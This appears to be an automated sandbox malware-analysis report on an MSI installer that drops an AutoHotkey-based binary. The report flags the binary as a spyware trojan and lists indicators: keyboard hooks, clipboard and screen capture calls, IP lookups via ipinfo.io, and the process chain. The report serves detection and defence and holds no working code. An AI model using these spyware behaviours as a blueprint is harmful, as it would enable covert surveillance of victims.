Source: nMv8.exe	String found in binary or memory: http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdf
Source: nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	String found in binary or memory: http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfS
Source: nMv8.exe	String found in binary or memory: http://www.ietf.org/rfc/rfc3447.txt
Source: nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	String found in binary or memory: http://www.ietf.org/rfc/rfc3447.txtS
Source: nMv8.exe, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	String found in binary or memory: http://www.indyproject.org/
Source: nMv8.exe, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	String found in binary or memory: http://www.itl.nist.gov/fipspubs/fip180-1.htm
Source: nMv8.exe	String found in binary or memory: http://www.movable-type.co.uk/scripts/xxtea.pdf
Source: nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	String found in binary or memory: http://www.movable-type.co.uk/scripts/xxtea.pdfS
Source: nMv8.exe	String found in binary or memory: http://www.schneier.com/paper-blowfish-fse.html
Source: nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	String found in binary or memory: http://www.schneier.com/paper-blowfish-fse.htmlS
Source: nMv8.exe	String found in binary or memory: http://www.schneier.com/paper-twofish-paper.pdf
Source: nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	String found in binary or memory: http://www.schneier.com/paper-twofish-paper.pdfS
Source: nMv8.exe, nMv8.exe, 00000015.00000000.860090595.00000000004AC000.00000002.00020000.sdmp, nMv8.exe, 00000019.00000002.889151958.00000000004AC000.00000002.00020000.sdmp, Vk5OSNAZ1qGr0gp2STA6jj7mn.4.dr	String found in binary or memory: https://autohotkey.com
Source: nMv8.exe, 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp, nMv8.exe, 00000015.00000000.860090595.00000000004AC000.00000002.00020000.sdmp, nMv8.exe, 00000019.00000002.889151958.00000000004AC000.00000002.00020000.sdmp, Vk5OSNAZ1qGr0gp2STA6jj7mn.4.dr	String found in binary or memory: https://autohotkey.comCould
Source: nMv8.exe, 0000000E.00000002.837388372.0000000005474000.00000002.00020000.sdmp, nMv8.exe, 00000015.00000002.877825324.0000000005244000.00000002.00020000.sdmp, nMv8.exe, 00000019.00000002.890994937.0000000004DA4000.00000002.00020000.sdmp	String found in binary or memory: https://code.google.com/p/ddab-lib/issues/list
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: https://d.symcb.com/cps0%
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: https://d.symcb.com/rpa0
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: https://d.symcb.com/rpa0.
Source: nMv8.exe, 0000000E.00000003.828575334.0000000003220000.00000004.00000001.sdmp, nMv8.exe, 0000000E.00000003.828666877.00000000032B7000.00000004.00000001.sdmp, nMv8.exe, 0000000E.00000003.828803938.000000000334A000.00000004.00000001.sdmp, nMv8.exe, 00000015.00000003.868541058.0000000005300000.00000004.00000001.sdmp, nMv8.exe, 00000015.00000003.868689010.0000000005397000.00000004.00000001.sdmp, nMv8.exe, 00000015.00000003.868854523.000000000542A000.00000004.00000001.sdmp, nMv8.exe, 00000019.00000003.888592122.00000000053CA000.00000004.00000001.sdmp, nMv8.exe, 00000019.00000003.888334752.00000000052F3000.00000004.00000001.sdmp, nMv8.exe, 00000019.00000003.888411993.0000000005337000.00000004.00000001.sdmp	String found in binary or memory: https://ipinfo.io/missingauth
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: https://www.advancedinstaller.com
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: https://www.thawte.com/cps0/
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown

DNS traffic detected: queries for: ipinfo.io

Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook

Show sources

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 21_2_0040E1C0 SetWindowsHookExW 0000000D,Function_000099D0,?,00000000

21_2_0040E1C0

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_004050A0 GetClipboardFormatNameW,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,GetClipboardData,

14_2_004050A0

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_00442F00 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,SelectObject,DeleteDC,DeleteObject,_free,GetPixel,ReleaseDC,

14_2_00442F00

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00414200 __wcsnicmp,__wcsnicmp,GetWindowThreadProcessId,AttachThreadInput,GetKeyboardLayout,GetTickCount,GetCurrentThreadId,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetTickCount,BlockInput,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,__wcsnicmp,_wcschr,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsicoll,PostMessageW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__wcsnicmp,__wcsnicmp,__fassign,PostMessageW,PostMessageW,PostMessageW,__itow,PostMessageW,_free,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetForegroundWindow,GetWindowThreadProcessId,	14_2_00414200
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00417A90 GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetKeyState,	14_2_00417A90
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_00414200 __wcsnicmp,__wcsnicmp,GetWindowThreadProcessId,AttachThreadInput,GetKeyboardLayout,GetTickCount,GetCurrentThreadId,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetTickCount,BlockInput,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,__wcsnicmp,_wcschr,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsicoll,PostMessageW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__wcsnicmp,__wcsnicmp,__fassign,PostMessageW,PostMessageW,PostMessageW,__itow,PostMessageW,_free,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetForegroundWindow,GetWindowThreadProcessId,	21_2_00414200
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_00414476 GetKeyboardLayout,GetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,BlockInput,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,_free,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,	21_2_00414476
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_00414646 GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,_free,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,	21_2_00414646

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_00415980 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

14_2_00415980

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_004051A0 GetTickCount,IsClipboardFormatAvailable,GetTickCount,OpenClipboard,OpenClipboard,GetTickCount,OpenClipboard,

14_2_004051A0

System Summary:

Sample or dropped binary is a compiled AutoHotkey binary

Show sources

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Window found: window name: AutoHotkey	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Window found: window name: AutoHotkey	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Window found: window name: AutoHotkey	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 844

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI9AEB.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 21_2_0045E4D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

21_2_0045E4D0

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\6296d4.msi

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049DBD20	4_2_049DBD20
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00450AE0	14_2_00450AE0
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0040D050	14_2_0040D050
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00412810	14_2_00412810
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00448020	14_2_00448020
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_004298E0	14_2_004298E0
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00438080	14_2_00438080
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_004A6095	14_2_004A6095
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0049B0AD	14_2_0049B0AD
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_004A01E6	14_2_004A01E6
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_004A49F8	14_2_004A49F8
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0042AA40	14_2_0042AA40
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00414200	14_2_00414200
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0048CA80	14_2_0048CA80
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_004A0D5D	14_2_004A0D5D
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00428D20	14_2_00428D20
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0047DE50	14_2_0047DE50
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00425610	14_2_00425610
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00442F00	14_2_00442F00
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00496710	14_2_00496710
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_00419780	14_2_00419780
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_00450AE0	21_2_00450AE0
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_0040D050	21_2_0040D050
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_004A807E	21_2_004A807E
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_00448020	21_2_00448020
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_00438080	21_2_00438080
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_004A6095	21_2_004A6095
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_0049B0AD	21_2_0049B0AD
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_004A01E6	21_2_004A01E6
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_00414200	21_2_00414200
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_00487370	21_2_00487370
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_00425610	21_2_00425610
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_0043B4C0	21_2_0043B4C0
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_004115D0	21_2_004115D0
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_00425610	21_2_00425610
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_00496710	21_2_00496710

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: String function: 0047E600 appears 62 times
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: String function: 0047E6A0 appears 42 times
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: String function: 00499009 appears 31 times
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: String function: 00408BEA appears 36 times
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: String function: 00498079 appears 311 times
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: String function: 004987FA appears 44 times
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: String function: 004A6C70 appears 39 times
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: String function: 004398E0 appears 211 times
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: String function: 00439610 appears 64 times

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 21_2_00449020: CreateFileW,DeviceIoControl,CloseHandle,

21_2_00449020

Source: C003I7GF0S8F920G600203.msi

Binary or memory string: OriginalFilenameAICustAct.dllF vs C003I7GF0S8F920G600203.msi

Source: MSIA1C6.tmp.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: MSIA1C6.tmp.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: MSIA1C6.tmp.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: MSIA1C6.tmp.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: MSIA1C6.tmp.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: MSIA1C6.tmp.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: MSIA1C6.tmp.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: MSIA1C6.tmp.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: MSIA1C6.tmp.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: MSIA1C6.tmp.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: MSIA1C6.tmp.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Vk5OSNAZ1qGr0gp2STA6jj7mn.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Vk5OSNAZ1qGr0gp2STA6jj7mn.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Vk5OSNAZ1qGr0gp2STA6jj7mn.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Vk5OSNAZ1qGr0gp2STA6jj7mn.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Vk5OSNAZ1qGr0gp2STA6jj7mn.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Section loaded: hpdofzxzkq.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Section loaded: hpdofzxzkq.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Section loaded: hpdofzxzkq.dll	Jump to behavior

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\C003I7GF0S8F920G600203.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C48C9974BE223117E013BA6B02E31CE9
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 844
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C48C9974BE223117E013BA6B02E31CE9	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk	Jump to behavior

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 21_2_0045E4D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

21_2_0045E4D0

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\VHETNiUaeF

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF24C0F8DA589AF6E5.TMP

Jump to behavior

Source: classification engine

Classification label: mal64.troj.spyw.evad.winMSI@15/35@3/4

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_00449DC0 CoCreateInstance,__fassign,

14_2_00449DC0

Source: C:\Windows\SysWOW64\msiexec.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_00448CC0 _wcsncpy,GetDiskFreeSpaceExW,

14_2_00448CC0

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_0043A5E0 GetFileAttributesW,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,_memset,CreateProcessW,CloseHandle,CloseHandle,GetLastError,_memset,__wcsicoll,_wcschr,SetCurrentDirectoryW,_wcschr,_wcschr,GetFileAttributesW,_wcschr,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,

14_2_0043A5E0

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_0045E6E0 CreateToolhelp32Snapshot,Process32FirstW,__wcstoi64,Process32NextW,__wsplitpath,__wcsicoll,Process32NextW,CloseHandle,CloseHandle,CloseHandle,

14_2_0045E6E0

Source: C003I7GF0S8F920G600203.msi

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C003I7GF0S8F920G600203.msi

Static file information: TRID: Microsoft Windows Installer (77509/1) 52.18%

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4944
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Code function: 14_2_00480460 LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW,ExtractIconW,

14_2_00480460

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Command line argument: /restart	21_2_00404150
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Command line argument: /force	21_2_00404150
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Command line argument: /ErrorStdOut	21_2_00404150
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Command line argument: /iLib	21_2_00404150
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Command line argument: /CP	21_2_00404150
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Command line argument: /Debug	21_2_00404150
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Command line argument: 9000	21_2_00404150
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Command line argument: localhost	21_2_00404150
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Command line argument: 9000	21_2_00404150
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Command line argument: A_Args	21_2_00404150
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Command line argument: A_Args	21_2_00404150
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Command line argument: @cM	21_2_00404150
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Command line argument: AutoHotkey	21_2_00404150
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Command line argument: AutoHotkey	21_2_00404150
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Command line argument: Clipboard	21_2_00404150

Source: nMv8.exe	String found in binary or memory: NATS-SEFI-ADD
Source: nMv8.exe	String found in binary or memory: NATS-DANO-ADD
